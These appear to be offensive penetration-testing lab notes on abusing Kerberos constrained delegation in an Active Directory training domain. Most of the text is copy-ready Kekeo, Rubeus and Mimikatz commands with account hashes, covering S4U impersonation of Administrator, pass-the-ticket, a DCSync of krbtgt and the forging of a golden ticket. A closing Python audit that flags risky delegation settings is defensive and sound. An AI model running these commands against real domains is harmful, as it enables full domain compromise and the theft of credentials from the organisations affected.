Priv Esc - Constrained Delegation
General/Basic (unconstrained) delegation allows the first-hop server (the web server in our example) to request access to any service on any computer in the domain. Constrained delegation limits the first-hop server to the services listed for it.
Constrained Delegation For Users
import-module .\PowerView_dev.ps1
#The service account must have the TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION (T2A4D) flag set in its UserAccountControl attribute
#Enumerate users and computers with constrained delegation enabled
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth
#open powershell as normal user
cd .\kekeo
cd .\x64
#Get the TGT for websvc
tgt::ask /user:websvc /domain:dollarcorp.moneycorp.local /rc4:cc098f204c5887eaa8253e7c2749156f
#Request the TGS using the TGT of websvc: we impersonate Administrator, but only to cifs/dcorp-mssql (the service websvc is allowed to delegate to)
tgs::s4u /tgt:TGT_websvc@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:cifs/dcorp-mssql.dollarcorp.moneycorp.LOCAL
exit
import-module invoke-mimikatz
#Run Invoke-Mimikatz from the directory where the ticket was saved and inject the ticket (pass-the-ticket):
Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_cifs~dcorp-mssql.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL.kirbi"'
klist
#As you can see, we now have a ticket as Administrator for dcorp-mssql
#Confirm access. The ticket is for CIFS only: we can reach the file system, but we do not get access via Enter-PSSession
ls \\dcorp-mssql\c$
#To abuse constrained delegation using Rubeus, we can use the following command
#(we are requesting the TGT and the TGS in a single command):
.\Rubeus.exe s4u /user:websvc /rc4:cc098f204c5887eaa8253e7c2749156f /impersonateuser:Administrator /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL" /ptt
#Confirm access. The ticket is for CIFS only: we can reach the file system, but we do not get access via Enter-PSSession
ls \\dcorp-mssql.dollarcorp.moneycorp.local\c$
Constrained Delegation - Server
import-module .\PowerView_dev.ps1
#The service account must have the TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION (T2A4D) flag set in its UserAccountControl attribute
#Enumerate users and computers with constrained delegation enabled
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth
----------------------- Let's Abuse it with Server Hash-----------------------
Get-DomainComputer -TrustedToAuth
#Either the plaintext password or the NTLM hash of the account is required. Here we have the hash of the dcorp-adminsrv$ computer account
#Using asktgt from Kekeo, we request a TGT:
kekeo.exe
tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /rc4:5e77978a734e3a7f3895fb0fdbda3b96
#Using s4u from Kekeo_one (no SNAME validation): we request a ticket for the time service and for the LDAP service
tgs::s4u /tgt:TGT_dcorp-adminsrv$@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:time/dcorp-dc.dollarcorp.moneycorp.LOCAL|ldap/dcorp-dc.dollarcorp.moneycorp.LOCAL
#Exit kekeo
exit
#Dot-source Invoke-Mimikatz from the kekeo directory
. ..\..\invoke-mimikatz.ps1
#Using mimikatz, inject the ldap ticket (the _ALT ticket obtained via the alternate service name):
Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_ldap~dcorp-dc.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL_ALT.kirbi"'
#We can now request any secret with DCSync by IMPERSONATING the domain administrator, without compromising the domain administrator's credentials
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
#Perform the Golden Ticket attack with the krbtgt hash shown above
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /id:500 /groups:513 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
klist
ls \\dcorp-dc\c$
cd \\dcorp-dc\c$
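The -TrustedToAuth enumeration in both sections keys on the T2A4D bit of userAccountControl together with msDS-AllowedToDelegateTo. The following audit, an added example that is not part of these notes or of PowerView/Kekeo/Rubeus, decodes those attributes on constructed sample records (names mirror the lab above; the Account class, flag constants and group names are my assumptions) and flags the configurations the walkthrough exploits, including delegation to a DC host, which reaches ldap/ (DCSync) because the service name is not validated, and privileged accounts that are still delegatable.

```python
# Added audit example (not from the original notes or the tools they use).
# Sample records below are constructed; attribute names mirror real AD ones.
from dataclasses import dataclass, field

# userAccountControl bits (ADS_USER_FLAG values)
TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
NOT_DELEGATED = 0x100000                    # "account is sensitive and cannot be delegated"
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # T2A4D: protocol transition allowed

PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}


@dataclass
class Account:
    sam: str                      # sAMAccountName
    uac: int                      # userAccountControl
    allowed_to_delegate_to: list = field(default_factory=list)  # msDS-AllowedToDelegateTo
    member_of: list = field(default_factory=list)               # group names


def audit(accounts, domain_controllers):
    """Return (sAMAccountName, finding) pairs for a defender to review."""
    dcs = {dc.lower() for dc in domain_controllers}
    findings = []
    for a in accounts:
        if a.uac & TRUSTED_FOR_DELEGATION:
            findings.append((a.sam, "unconstrained delegation enabled"))
        if a.uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
            findings.append((a.sam, "protocol transition (T2A4D): S4U2Self tickets "
                                    "for any user without that user's credentials"))
        for spn in a.allowed_to_delegate_to:
            svc, _, rest = spn.partition("/")
            host = rest.split(":")[0].lower()
            if host in dcs:
                # The service class of the issued ticket is not validated (see the
                # time/|ldap/ step above), so any SPN on a DC reaches ldap/ (DCSync).
                findings.append((a.sam, f"may delegate to domain controller {host} "
                                        f"({svc}/); every service on that host is reachable"))
        if (PRIVILEGED_GROUPS & set(a.member_of) and not a.uac & NOT_DELEGATED
                and "Protected Users" not in a.member_of):
            findings.append((a.sam, "privileged account is delegatable: mark it "
                                    "'sensitive, cannot be delegated' or add to Protected Users"))
    return findings


# Constructed sample records mirroring the lab (0x200 normal account, 0x1000 workstation trust)
SAMPLE = [
    Account("websvc", 0x200 | 0x10000 | TRUSTED_TO_AUTH_FOR_DELEGATION,
            ["CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL"]),
    Account("dcorp-adminsrv$", 0x1000 | TRUSTED_TO_AUTH_FOR_DELEGATION,
            ["time/dcorp-dc.dollarcorp.moneycorp.LOCAL"]),
    Account("Administrator", 0x200, member_of=["Domain Admins"]),
    Account("svc_backup", 0x200 | NOT_DELEGATED, member_of=["Domain Admins"]),
]
DCS = ["dcorp-dc.dollarcorp.moneycorp.LOCAL"]
```

Running audit(SAMPLE, DCS) reports both T2A4D accounts, the DC-reachable delegation of dcorp-adminsrv$, and the unprotected Administrator account, while the account marked NOT_DELEGATED produces nothing.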